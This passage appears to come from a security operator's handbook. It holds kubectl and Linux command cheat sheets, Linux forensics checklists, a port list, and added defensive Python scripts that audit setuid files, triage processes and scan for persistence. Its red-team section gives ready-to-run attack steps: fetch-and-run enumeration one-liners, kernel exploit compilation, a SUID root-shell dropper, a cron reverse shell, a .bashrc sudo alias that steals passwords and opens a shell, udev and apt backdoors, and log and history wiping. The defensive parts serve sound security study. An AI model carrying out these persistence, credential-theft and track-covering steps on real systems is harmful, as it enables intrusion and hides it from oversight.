that the cluster
would be in if
the manifest was
applied.
UPDATING RESOURCES
kubectl set image deployment/frontend www=image:v2              Rolling update "www" containers of "frontend" deployment, updating the image
kubectl rollout history deployment/frontend                     Check the history of deployments including the revision
kubectl rollout undo deployment/frontend                        Rollback to the previous deployment
kubectl rollout undo deployment/frontend --to-revision=2        Rollback to a specific revision
kubectl rollout status -w deployment/frontend                   Watch rolling update status of "frontend" deployment until completion
kubectl rollout restart deployment/frontend                     Rolling restart of the "frontend" deployment

# deprecated starting version 1.11
kubectl rolling-update frontend-v1 -f [Link]                    Rolling update pods of frontend-v1 (deprecated)
kubectl rolling-update frontend-v1 frontend-v2 --image=image:v2 Change the name of the resource and update the image (deprecated)
kubectl rolling-update frontend --image=image:v2                Update the pods image of frontend (deprecated)
kubectl rolling-update frontend-v1 frontend-v2 --rollback       Abort existing rollout in progress (deprecated)

kubectl expose rc nginx --port=80 --target-port=8000            Create a service for a replicated nginx which serves on port 80 and connects to the containers on port 8000

# Update a single-container pod's image version (tag) to v4
kubectl get pod mypod -o yaml | sed 's/\(image: myimage\):.*$/\1:v4/' | kubectl replace -f -

kubectl label pods my-pod new-label=awesome                     Add a Label
kubectl annotate pods my-pod icon-url=[Link]                    Add an annotation
kubectl autoscale deployment foo --min=2 --max=10               Auto scale a deployment "foo"
EDITING RESOURCES
kubectl edit svc/docker-registry                                Edit the service named docker-registry
KUBE_EDITOR="nano" kubectl edit svc/docker-registry             Use an alternative editor
SCALING RESOURCES
kubectl scale --replicas=3 rs/foo                               Scale a replicaset named 'foo' to 3
kubectl scale --replicas=3 -f [Link]                            Scale a resource specified in "[Link]" to 3
kubectl scale --current-replicas=2 --replicas=3 deployment/mysql   If the deployment named mysql's current size is 2, scale mysql to 3
kubectl scale --replicas=5 rc/foo rc/bar rc/baz                 Scale multiple replication controllers
DELETE RESOURCES
kubectl delete -f ./[Link]                                      Delete a pod using the type and name specified in [Link]
kubectl delete pod,service baz foo                              Delete pods and services with same names "baz" and "foo"
kubectl delete pods,services -l name=myLabel                    Delete pods and services with label name=myLabel
kubectl -n my-ns delete pod,svc --all                           Delete all pods and services in namespace my-ns
kubectl get pods -n mynamespace --no-headers=true | awk '/pattern1|pattern2/{print $1}' | xargs kubectl delete -n mynamespace pod   Delete all pods matching the awk pattern1 or pattern2
INTERACT PODS
kubectl logs my-pod                                             dump pod logs (stdout)
kubectl logs -l name=myLabel                                    dump pod logs with label name=myLabel (stdout)
kubectl logs my-pod --previous                                  dump pod logs (stdout) for a previous instantiation of a container
kubectl logs my-pod -c my-container                             dump pod container logs (stdout, multi-container case)
kubectl logs -l name=myLabel -c my-container                    dump pod logs with label name=myLabel (stdout)
kubectl logs my-pod -c my-container --previous                  dump pod container logs (stdout, multi-container case) for a previous instantiation of a container
kubectl logs -f my-pod                                          stream pod logs (stdout)
kubectl logs -f my-pod -c my-container                          stream pod container logs (stdout, multi-container case)
kubectl logs -f -l name=myLabel --all-containers                stream all pods logs with label name=myLabel (stdout)
kubectl run -i --tty busybox --image=busybox -- sh              Run pod as interactive shell
kubectl run nginx --image=nginx --restart=Never -n mynamespace  Run pod nginx in a specific namespace
kubectl run nginx --image=nginx --restart=Never --dry-run -o yaml > [Link]   Run pod nginx and write its spec into a file called [Link]
kubectl attach my-pod -i                                        Attach to Running Container
kubectl port-forward my-pod 5000:6000                           Listen on port 5000 on the local machine and forward to port 6000 on my-pod
kubectl exec my-pod -- ls /                                     Run command in existing pod (1 container case)
kubectl exec my-pod -c my-container -- ls /                     Run command in existing pod (multi-container case)
kubectl top pod POD_NAME --containers                           Show metrics for a given pod and its containers
INTERACTING NODES/CLUSTER
kubectl cordon my-node                                          Mark my-node as unschedulable
kubectl drain my-node                                           Drain my-node in preparation for maintenance
kubectl uncordon my-node                                        Mark my-node as schedulable
kubectl top node my-node                                        Show metrics for a given node
kubectl cluster-info                                            Display addresses of the master and services
kubectl cluster-info dump                                       Dump current cluster state to stdout
kubectl cluster-info dump --output-directory=/path/to/cluster-state   Dump current cluster state to /path/to/cluster-state
RESOURCE TYPES
kubectl api-resources --namespaced=true                         All namespaced resources
kubectl api-resources --namespaced=false                        All non-namespaced resources
kubectl api-resources -o name                                   All resources with simple output (just the resource name)
kubectl api-resources -o wide                                   All resources with expanded (aka "wide") output
kubectl api-resources --verbs=list,get                          All resources that support the "list" and "get" request verbs
kubectl api-resources --api-group=extensions                    All resources in the "extensions" API group

REFERENCE:
[Link]
[Link]
[Link]

LINUX_Commands
ALL ADMINISTRATION LINUX

FILE SYSTEM
ls                      list items in current directory
ls -l                   list items in current directory in long format
ls -a                   list all items in current directory, including hidden files
ls -F                   list all items in current directory and show directories with a slash and executables with a star
ls dir                  list all items in directory dir
cd dir                  change directory to dir
cd ..                   go up one directory
cd /                    go to the root directory
cd ~                    go to your home directory
cd -                    go to the last directory you were in
pwd                     show present working directory
mkdir dir               make directory dir
rm file                 remove file
rm -r dir               remove directory dir recursively
cp file1 file2          copy file1 to file2
cp -r dir1 dir2         copy directory dir1 to dir2 recursively
mv file1 file2          move (rename) file1 to file2
ln -s file link         create symbolic link to file
touch file              create or update file
cat file                output the contents of file
less file               view file with page navigation
head file               output the first 10 lines of file
tail file               output the last 10 lines of file
tail -f file            output the contents of file as it grows, starting with the last 10 lines
vim file                edit file
alias name 'command'    create an alias for a command
SYSTEM
cat /etc/*release* OS version
cat /etc/issue OS version
cat /proc/version Kernel information
date show the current date and time
df show disk usage
du show directory space usage
finger user display information about user
free show memory and swap usage
last -a Users to login last
man command show the manual for command
mount Show any mounted file systems
nbtstat -A <IP> or <CIDR> Query hostname for IP or CIDR
reboot restart machine
shutdown shut down machine
uname -a CPU arch and kernel version
whereis app show possible locations of app
which app               show which app will be run by default
who -a Combined user information
whoami who you are logged in as
PROCESS ADMINISTRATION
ps -aef                 display your currently active processes
top                     display all running processes
kill pid#               kill process id pid
kill -9 pid#            force kill process id pid
NETWORKING
echo "1" > /proc/sys/net/ipv4/ip_forward        Enable IP forwarding
echo "nameserver <IP>" > /etc/[Link]            Insert a new DNS server
ifconfig <eth#> <IP>/<CIDR>                     Configure eth# interface IP
iwlist <wlan#> scan                             WiFi broadcast scan
lsof -i                                         List open files connection status
lsof -i tcp:80                                  List all processes running on port 80
netstat -ant                                    Top tcp network connection status
netstat -anu                                    Top udp network connection status
route add default gw <IP>                       Configure gateway IP
share <USER> <IP> C$                            Mount Windows C share
smb://<IP>/IPC$                                 SMB connect Windows IPC share
smbclient -U <USER> \\\\<IP>\\<SHARE>           SMBclient connect to share
watch netstat -an                               Continuous network connect status
PERMISSIONS
ls -lart                list items by date in current directory and show permissions
chmod ugo file          change permissions of file to ugo - u is the user's permissions, g is the group's permissions, and o is everyone else's permissions. The values of u, g, and o can be any number between 0 and 7.
7 — full permissions
6 — read and write only
5 — read and execute only
4 — read only
3 — write and execute only
2 — write only
1 — execute only
0 — no permissions
chmod 600 file          you can read and write - good for files
chmod 700 file          you can read, write, and execute - good for scripts
chmod 644 file          you can read and write, and everyone else can only read - good for web pages
chmod 755 file          you can read, write, and execute, and everyone else can read and execute - good for programs that you want to share
UTILITIES
curl <URL> -O           download a file
dig -x host             reverse lookup host
dig [Link]              get DNS information for domain
dos2unix [Link]         converts windows to unix format
lsof -i tcp:80          list all processes running on port 80
ping host               ping host or IP and output results
scp -r user@host:dir dir   secure copy the directory dir from remote server to the directory dir on your machine
scp file user@host:dir  secure copy a file from your machine to the dir directory on a remote server
scp user@host:file dir  secure copy a file from remote server to the dir directory on your machine
script -a [Link]        record terminal to file
ssh -p port user@host   SSH connect to host on port as user
ssh user@host           SSH connect to host as user
ssh-copy-id user@host   add your key to host for user to enable a keyed or passwordless login
wget <URL> -O [Link]    download a file
whois [Link]            get information for domain
SEARCHING
grep pattern files      search for pattern in files
grep -r pattern dir     search recursively for pattern in dir
grep -rn pattern dir    search recursively for pattern in dir and show the line number found
grep -r pattern dir --include='*.ext'   search recursively for pattern in dir and only search in files with .ext extension
command | grep pattern  search for pattern in the output of command
find file               find all instances of file in real system
locate file             find all instances of file using indexed database built from the updatedb command. Much faster than find
sed -i 's/day/night/g' file   find all occurrences of day in a file and replace them with night - s means substitute and g means global - sed also supports regular expressions
COMPRESSION
tar cf [Link] files     create a tar named [Link] containing files
tar xf [Link]           extract the files from [Link]
tar czf [Link] files    create a tar with Gzip compression
tar xzf [Link]          extract a tar using Gzip
gzip file               compresses file and renames it to [Link]
gzip -d [Link]          decompresses [Link] back to file
zip -r <[Link]> \path\* Zip contents of directory
SHORTCUTS
ctrl+a move cursor to start of line
ctrl+f move cursor to end of line
alt+f move cursor forward 1 word
alt+b move cursor backward 1 word

REFERENCE:
[Link]

LINUX_Defend
BLUE TEAM FORENSICS Linux

Evidence Collection Order of Volatility (RFC3227)


• Registers, cache
• Routing table, arp cache, process table, kernel statistics, memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the system in question
• Physical configuration, network topology
• Archival media

LINUX ARTIFACT COLLECTION

System Information
date
uname -a
hostname
cat /proc/version
lsmod
service --status-all

Disk/Partition Information
fdisk -l

Open Files & Disk/Space Usage


lsof -i
du
df

Networking Configuration/Connections/Socket Stats


ifconfig -a
netstat -apetul
netstat -plan
netstat -plant
ss -l
ss -ta
ss -tp

User/Account Information
whoami
who
last
lastb
cat /var/log/[Link]
cat /etc/passwd
cat /etc/shadow
cat /etc/sudoers
cat /etc/sudoers.d/*
cut -d: -f1 /etc/passwd
getent passwd | cut -d: -f1
compgen -u
xclip -o

Processes/System Calls/Network Traffic


ps -s
ps -l
ps -o
ps -t
ps -m
ps -a
ps -aef
ps -auxwf
top
strace -f -e trace=network -s 10000 <PROCESS WITH ARGUMENTS>;
strace -f -e trace=network -s 10000 -p <PID>;

Environment/Startup/Tasks Information
cat /etc/profile
ls /etc/profile.d/
cat /etc/profile.d/*
ls /etc/cron.*
ls /etc/cron.*/*
cat /etc/cron.*/*
cat /etc/crontab
ls /etc/*.d
cat /etc/*.d/*
cat /etc/[Link]
cat ~/.bash_profile
cat ~/.bashrc

Kernel/Browser/PAM Plugins & Modules


ls -la /lib/modules/*/kernel/*
ls -la ~/.mozilla/plugins
ls -la /usr/lib/mozilla/plugins
ls -la /usr/lib64/mozilla/plugins
ls -la ~/.config/google-chrome/Default/Extensions/
cat /etc/pam.d/sudo
cat /etc/[Link]
ls /etc/pam.d/

Hidden Directories & Files


find / -type d -name ".*"

Immutable Files & Directories


lsattr / -R 2> /dev/null | grep "\----i"

SUID/SGID & Sticky Bit Special Permissions


find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
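The chmod table in the LINUX_Commands section and the SUID/SGID search above are two views of the same permission bits. The following Python script is an added example (not from the Operator Handbook) that decodes an ls -l mode string such as "-rwsr-xr-x" into the octal number chmod takes, names the special bits, and walks a tree the way the `find / -perm -04000 -o -perm -02000` search does. The mode strings used for the checks are constructed; audit_tree() reads the real file system.

```python
"""Decode Linux permission modes and find setuid/setgid files.

Added example; not from the Operator Handbook. It turns the ls -l mode
string (e.g. "-rwsr-xr-x") into the octal number the chmod table uses,
names the special bits, and walks a directory tree the way the handbook's
`find / -perm -04000 -o -perm -02000` does. audit_tree() reads the real
file system; the other functions work on constructed strings.
"""
import os
import stat

SPECIAL_BITS = (
    (stat.S_ISUID, "setuid"),
    (stat.S_ISGID, "setgid"),
    (stat.S_ISVTX, "sticky"),
    (stat.S_IWOTH, "world-writable"),
)


def parse_mode_string(text):
    """Convert a 10-character ls -l mode string to numeric permission bits."""
    if len(text) != 10:
        raise ValueError(f"expected 10 characters, got {text!r}")
    mode = 0
    for index, ch in enumerate(text[1:]):        # skip the file-type character
        bit = 1 << (8 - index)                   # rwx triplets map to 0o400 .. 0o001
        if ch in "rwx":
            mode |= bit
        elif ch in "sS" and index in (2, 5):     # user/group execute slot
            mode |= stat.S_ISUID if index == 2 else stat.S_ISGID
            if ch == "s":                        # lowercase: execute bit also set
                mode |= bit
        elif ch in "tT" and index == 8:          # other execute slot
            mode |= stat.S_ISVTX
            if ch == "t":
                mode |= bit
        elif ch != "-":
            raise ValueError(f"unexpected character {ch!r} in {text!r}")
    return mode


def octal(mode):
    """Render a mode as chmod would accept it, e.g. 0o4755 -> '4755'."""
    return f"{stat.S_IMODE(mode):04o}"


def special_flags(mode):
    """Names of the bits a reviewer cares about, in a fixed order."""
    return [name for bit, name in SPECIAL_BITS if mode & bit]


def audit_tree(root):
    """Yield (path, octal mode, flags) for regular files with setuid or setgid set.

    Equivalent to the handbook's find -perm -04000 -o -perm -02000 search;
    run as root for a complete view, since unreadable directories are skipped.
    """
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, octal(st.st_mode), special_flags(st.st_mode)


if __name__ == "__main__":
    for entry in audit_tree("/"):
        print(*entry)
```

Diffing the audit_tree() output against a known-good baseline of the same host is what makes the list useful; the set of setuid binaries on a stock install is small and changes rarely.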

File & Directories with no user/group name


find / \( -nouser -o -nogroup \) -exec ls -lg {} \;

File types in current directory


file * -p

Executables on file system


find / -type f -exec file -p '{}' \; | grep ELF

Hidden Executables on file system


find / -name ".*" -exec file -p '{}' \; | grep ELF

Files modified within the past day


find / -mtime -1

Remotely Analyze Traffic Over SSH


ssh root@<IP/HOST> tcpdump -i any -U -s 0 -w - 'not port 22'

Persistence Areas of Interest
/etc/[Link]
/etc/initd
/etc/rc*.d
/etc/modules
/etc/cron*
/var/spool/cron/*

Audit Logs
ls -al /var/log/*
ls -al /var/log/*tmp
utmpdump /var/log/btmp
utmpdump /var/run/utmp
utmpdump /var/log/wtmp

PROCESS FORENSICS
Detailed Process Information
ls -al /proc/[PID]

NOTE:
cwd = Current Working Directory of Malware
exe = Binary location and whether it has been deleted

Recover Deleted Binary Currently Running


cp /proc/[PID]/exe /[destination]/[binaryname]

Capture Binary Data for Review


cp /proc/[PID]/ /[destination]/[PID]/

Binary Hash Information


sha1sum /[destination]/[binaryname]
md5sum /[destination]/[binaryname]

Process Command Line Information


cat /proc/[PID]/cmdline
cat /proc/[PID]/comm

NOTE: Significant differences in the above 2 outputs and the specified binary name under /proc/[PID]/exe can be indicative of malicious software attempting to remain undetected.

Process Environment Variables


NOTE: Includes user who ran binary
strings /proc/[PID]/environ
cat /proc/[PID]/environ

Process File Descriptors/Maps
NOTE: Shows what the process is ‘accessing’ or using
ls -al /proc/[PID]/fd
cat /proc/[PID]/maps

Process Stack/Status Information


NOTE: May reveal useful elements
cat /proc/[PID]/stack
cat /proc/[PID]/status

Show Deleted Binaries Currently Running


ls -alr /proc/*/exe 2> /dev/null | grep deleted

Process Working Directories


NOTE: Including common targeted directories for malicious activity
ls -alr /proc/*/cwd
ls -alr /proc/*/cwd 2> /dev/null | grep tmp
ls -alr /proc/*/cwd 2> /dev/null | grep dev
ls -alr /proc/*/cwd 2> /dev/null | grep var
ls -alr /proc/*/cwd 2> /dev/null | grep home
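The process checks above (cmdline vs comm vs exe, deleted binaries still running, working directories in tmp/dev/var/home) are easy to automate across every PID. The following Python script is an added example (not from the Operator Handbook) that reads the same /proc entries and reports those three conditions. SAMPLE_PROCS is constructed data with made-up names and paths so the logic can be checked offline; scan_all() reads the live /proc and needs root to see other users' exe and cwd links.

```python
"""Triage running processes with the /proc indicators this section lists.

Added example; not from the Operator Handbook. For each PID it reads the
same entries the handbook names (exe, comm, cmdline, cwd) and flags the
conditions the notes describe: a backing binary that was deleted while
running, a comm/cmdline/exe name mismatch, and a working directory in one
of the commonly abused locations (tmp, dev, var, home). SAMPLE_PROCS is
constructed data so the logic can be checked offline; scan_all() reads the
live /proc and needs root to see other users' processes fully.
"""
import os

SUSPICIOUS_CWD_PREFIXES = ("/tmp", "/dev", "/var", "/home")
COMM_MAX = 15  # the kernel truncates comm to 15 characters

# Constructed records in the shape read_proc() returns; names and paths are made up.
SAMPLE_PROCS = [
    {"pid": 1234, "comm": "sshd", "cmdline": ["/usr/sbin/sshd", "-D"],
     "exe": "/usr/sbin/sshd", "cwd": "/"},
    {"pid": 4321, "comm": "kworker/0:1", "cmdline": ["/tmp/.x/updater"],
     "exe": "/tmp/.x/updater (deleted)", "cwd": "/tmp/.x"},
]


def triage(proc):
    """Return a list of finding strings for one process record (empty if nothing stands out)."""
    findings = []
    exe = proc.get("exe") or ""
    if exe.endswith(" (deleted)"):
        findings.append("backing binary deleted while still running")
        exe = exe[: -len(" (deleted)")]
    argv0 = os.path.basename(proc["cmdline"][0]) if proc.get("cmdline") else ""
    exe_name = os.path.basename(exe)
    comm = proc.get("comm", "")
    expected = {name[:COMM_MAX] for name in (argv0, exe_name) if name}
    if comm and expected and comm[:COMM_MAX] not in expected:
        findings.append(f"comm {comm!r} does not match argv0 {argv0!r} / exe {exe_name!r}")
    cwd = proc.get("cwd") or ""
    if cwd.startswith(SUSPICIOUS_CWD_PREFIXES):
        findings.append(f"cwd {cwd} is in a commonly abused directory")
    return findings


def read_proc(pid):
    """Build a record from /proc/<pid>; raises OSError if the process vanished or is unreadable."""
    base = f"/proc/{pid}"

    def link(name):
        try:
            return os.readlink(f"{base}/{name}")
        except OSError:
            return None  # kernel threads have no exe; other users' links need root

    with open(f"{base}/comm") as handle:
        comm = handle.read().strip()
    with open(f"{base}/cmdline", "rb") as handle:
        cmdline = [arg.decode(errors="replace") for arg in handle.read().split(b"\0") if arg]
    return {"pid": int(pid), "comm": comm, "cmdline": cmdline,
            "exe": link("exe"), "cwd": link("cwd")}


def scan_all():
    """Triage every PID in /proc; returns the report lines."""
    lines = []
    for pid in sorted((p for p in os.listdir("/proc") if p.isdigit()), key=int):
        try:
            proc = read_proc(pid)
        except OSError:
            continue  # process exited between listdir and read, or not readable
        for finding in triage(proc):
            lines.append(f"pid {pid} ({proc['comm']}): {finding}")
    return lines


if __name__ == "__main__":
    print("\n".join(scan_all()) or "no findings")
```

The cwd rule is deliberately broad, as the handbook's greps are; daemons that legitimately run under /var or service accounts under /home will show up, so treat that finding as a prompt to look at the other two indicators for the same PID.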

MEMORY FORENSICS
Dump Memory
dd if=/dev/kmem of=/root/kmem
dd if=/dev/mem of=/root/mem

LiME
[Link]
sudo insmod ./[Link] "path=./[Link] format=raw"

Capture Disk Image


fdisk -l
dd if=/dev/sda1 of=/[outputlocation]

REFERENCE:
[Link]
[Link]
forensics-for-incident-responders/
[Link]
collection

LINUX_Exploit
RED TEAM EXPLOITATION Linux

LINENUM
Scripted local Linux enumeration and privilege escalation checks.
NOTE: You must place this script on the target host.

Summary of Categories Performed:


Kernel and Distribution
System Information
User Information
Privileged access
Environmental
Jobs/Tasks
Services
Version Information
Default/Weak Credentials
Useful File Searches
Platform/software tests

Full host enumeration with report output into tmp


[Link] -s -r [Link] -e /tmp/ -t

Direct execution one-liners

bash <(wget -q -O - [Link].sh) -r [Link] -e /tmp/ -t -i

bash <(curl -s [Link].sh) -r [Link] -e /tmp/ -t -i

REFERENCE:
[Link]

BeROOT
BeRoot is a post exploitation tool to check common
misconfigurations on Linux and Mac OS to find a way to escalate our
privilege. "linux-exploit-suggester" is embedded in this project.
NOTE: You must place this script on the target host.

Summary of Categories Performed:


GTFOBins
Wildcards
Sensitive files
Services
Suid binaries
Path Environment variable
NFS Root Squashing
LD_PRELOAD
Sudoers file
Sudo list
Python Library Hijacking

Capabilities
Ptrace Scope
Exploit Suggest

Basic enumeration
#Without user password
python [Link]

#If you have a user password
python [Link] --password <PASS>

REFERENCE:
[Link]

LINUX-SMART-ENUMERATION
Linux enumeration tool for pentesting and CTFs with verbosity
levels.
NOTE: You must place this script on the target host.

Summary of Categories Performed:


User related tests.
Sudo related tests.
File system related tests.
System related tests.
Security measures related tests.
Recurrent tasks (cron, timers) related tests.
Network related tests.
Services related tests.
Processes related tests.
Software related tests.
Container (docker, lxc) related tests.

Basic enumeration execution


[Link]

Increase verbosity and enumeration information


[Link] -l1

Dump everything that can be gathered from the host


[Link] -l2

One-liner download & chmod

wget "[Link]enumeration/raw/master/[Link]" -O [Link];chmod 700 [Link]
curl "[Link]enumeration/raw/master/[Link]" -Lo [Link];chmod 700 [Link]

Direct execution one-liner

bash <(wget -q -O - [Link]treitos/linux-smart-enumeration/master/[Link]) -l2 -i

bash <(curl -s [Link]treitos/linux-smart-enumeration/master/[Link]) -l1 -i

REFERENCE:
[Link]

COMMON EXPLOITS
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
[Link]

CVE-2010-4258 - Linux Kernel <= 2.6.37 'Full-Nelson.c'
[Link]

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
[Link]
wget -O exploit.c <[Link]
gcc -o mempodipper exploit.c
./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
[Link]
[Link]
[Link]
#Compile dirty cow:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow [Link] -lutil

CVE-2010-3904 - RDS Protocol - Linux 2.6.32
[Link]

Cross-compiling Exploit w/ GCC
#(32 bit)
gcc -m32 -o hello_32 hello.c
#(64 bit)
gcc -m64 -o hello_64 hello.c

PERSISTENCE

Create A Root User
sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john

SUID Binary
TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant

Crontab - Reverse shell
(crontab -l ; echo "@reboot sleep 200 && ncat [Link] 4242 -e /bin/bash")|crontab 2> /dev/null

Backdoor Target User .bashrc
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-[Link]-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2
#OR add the following line inside Target user .bashrc file:
$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
#then create the fakesudo script.
read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo $sudopass >> /tmp/[Link]
/usr/bin/sudo $@

Backdoor Startup Service
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

Backdoor Target User Startup File


First write a file in ~/.config/autostart/NAME_OF_FILE.desktop
#vi file ~/.config/autostart/*.desktop and add the below:

[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-
docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

Backdoor Driver
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-[Link] > /dev/null

Backdoor [Link].D
Create file in [Link].d directory:
APT::Update::Pre-Invoke {"CMD"};
When Target runs "apt-get update" your CMD will be executed.

#Example Ncat CMD
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/[Link].d/42backdoor
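Every persistence entry in this section writes to a well-known location and leaves a recognisable pattern there, which is what a defender should sweep for. The following Python script is an added example (not from the Operator Handbook, and a defender's check rather than one of the tools it lists) that scans shell rc files, crontabs, udev rules, apt.conf.d, autostart entries and if-up.d scripts for those patterns. The RULES and PATHS tables are this example's own choices; SAMPLES is constructed input with made-up addresses and paths.

```python
"""Scan persistence locations for the indicators described in this section.

Added example; it is not from the Operator Handbook and is a defender's
check, not a tool from the handbook. It looks, in the same places the
handbook's persistence entries write to, for the patterns they leave
behind: a shell rc alias shadowing sudo, an @reboot cron job that launches
a network shell, udev RUN+= commands, apt Pre-/Post-Invoke hooks,
autostart entries outside /usr and if-up.d scripts that start a listener.
The RULES and PATHS tables are this example's own; SAMPLES is constructed.
"""
import glob
import os
import re

RULES = {
    "shell_rc": [(re.compile(r"^\s*alias\s+(sudo|su|ssh)="),
                  "shell alias shadowing a privileged command")],
    "crontab": [(re.compile(r"@reboot.*(\bnc\b|\bncat\b|\bnetcat\b|\bsocat\b|bash -i|/dev/tcp/)"),
                 "@reboot job starting a network shell")],
    "udev": [(re.compile(r'RUN\+=\s*"'),
              "udev rule executes a command on device events")],
    "apt_conf": [(re.compile(r"APT::Update::(Pre|Post)-Invoke"),
                  "apt update hook executes a command")],
    "autostart": [(re.compile(r"^Exec=(?!/usr/)"),
                   "autostart entry runs a program outside /usr")],
    "if_up": [(re.compile(r"(\bnc\b|\bncat\b|\bnetcat\b|\bsocat\b).*\s-e\b"),
               "network script starts a listener with -e")],
}

# Where each kind of artifact lives on a typical Debian/Ubuntu-style host.
PATHS = {
    "shell_rc": ["/etc/bash.bashrc", "/etc/profile", "/etc/profile.d/*",
                 "~/.bashrc", "~/.zshrc", "~/.bash_profile"],
    "crontab": ["/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/*",
                "/var/spool/cron/crontabs/*"],
    "udev": ["/etc/udev/rules.d/*"],
    "apt_conf": ["/etc/apt/apt.conf.d/*"],
    "autostart": ["~/.config/autostart/*.desktop", "/etc/xdg/autostart/*.desktop"],
    "if_up": ["/etc/network/if-up.d/*"],
}

# Constructed sample contents, one per artifact kind; addresses and paths are made up.
SAMPLES = {
    "shell_rc": "export PATH=$PATH:~/bin\nalias ll='ls -la'\nalias sudo=~/.hidden/fakesudo\n",
    "crontab": "0 3 * * * /usr/local/bin/backup.sh\n@reboot sleep 200 && ncat 203.0.113.10 4242 -e /bin/bash\n",
    "udev": 'ACTION=="add",SUBSYSTEM=="usb",RUN+="/tmp/.u/run.sh"\n',
    "apt_conf": 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2>/dev/null &"};\n',
    "autostart": "[Desktop Entry]\nType=Application\nExec=/var/lib/gnome-welcome-tour\n",
    "if_up": "#!/bin/sh\nncat 203.0.113.10 4242 -e /bin/bash 2>/dev/null\n",
}


def scan_text(kind, text):
    """Return [(line number, meaning, line)] for every rule hit in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, meaning in RULES.get(kind, []):
            if pattern.search(line):
                hits.append((lineno, meaning, line.strip()))
    return hits


def scan_host():
    """Apply the rules to the real files; returns 'path:line: meaning: text' strings."""
    findings = []
    for kind, patterns in PATHS.items():
        for pattern in patterns:
            for path in sorted(glob.glob(os.path.expanduser(pattern))):
                try:
                    with open(path, errors="replace") as handle:
                        text = handle.read()
                except OSError:
                    continue  # unreadable without root, or a directory
                for lineno, meaning, line in scan_text(kind, text):
                    findings.append(f"{path}:{lineno}: {meaning}: {line}")
    return findings


if __name__ == "__main__":
    for finding in scan_host() or ["no persistence indicators found"]:
        print(finding)
```

The udev and apt rules will also fire on legitimate packaged hooks, so the useful signal is a hit whose file is not owned by any installed package (compare against `dpkg -S` on Debian-based systems) or whose mtime is recent relative to the rest of the directory.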

Linux Privilege Escalation MindMap

COVER TRACKS
Reset logfile to 0 without having to restart syslogd etc:
cat /dev/null > /var/log/[Link]

Clear terminal history


cat /dev/null > ~/.bash_history
history -c
export HISTFILESIZE=0
export HISTSIZE=0
unset HISTFILE

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Linux%20-%20Privilege%[Link]
[Link]
%20and%20Resources/Linux%20-%[Link]
[Link]

LINUX_Hardening
BLUE TEAM CONFIGURATION Linux

LINUX HARDENING GUIDE
[Link]x/ERNW_Hardening_Linux.md

LINUX_Ports
ALL INFORMATIONAL Linux

PORT APP_PROTOCOL SYSTEM SERVICE


1 TCP tcpmux TCP port service multiplexer
5 TCP rje Remote Job Entry
7 TCP echo Echo service
9 TCP discard Null service for connection
testing
11 TCP systat System Status service for
listing connected ports
13 TCP daytime Sends date and time to
requesting host
15 tcp netstat Network Status (netstat)
17 TCP qotd Sends quote of the day to
connected host
18 TCP msp Message Send Protocol
19 TCP chargen Character Generation
service; sends endless
stream of characters
20 TCP ftp-data FTP data port
21 TCP ftp File Transfer Protocol (FTP)
port; sometimes used by File
Service Protocol (FSP)
22 TCP ssh Secure Shell (SSH) service
23 TCP telnet The Telnet service
25 TCP smtp Simple Mail Transfer
Protocol (SMTP)
37 TCP time Time Protocol
39 TCP rlp Resource Location Protocol
42 TCP nameserver Internet Name Service
43 TCP nicname WHOIS directory service
49 TCP tacacs Terminal Access Controller
Access Control System for
TCP/IP based authentication
and access
50 TCP re-mail-ck Remote Mail Checking
Protocol
53 TCP domain domain name services (such
as BIND)
63 TCP whois++ WHOIS++, extended WHOIS
services
67 TCP bootps Bootstrap Protocol (BOOTP)
services;Dynamic Host

134
Configuration Protocol
(DHCP) services
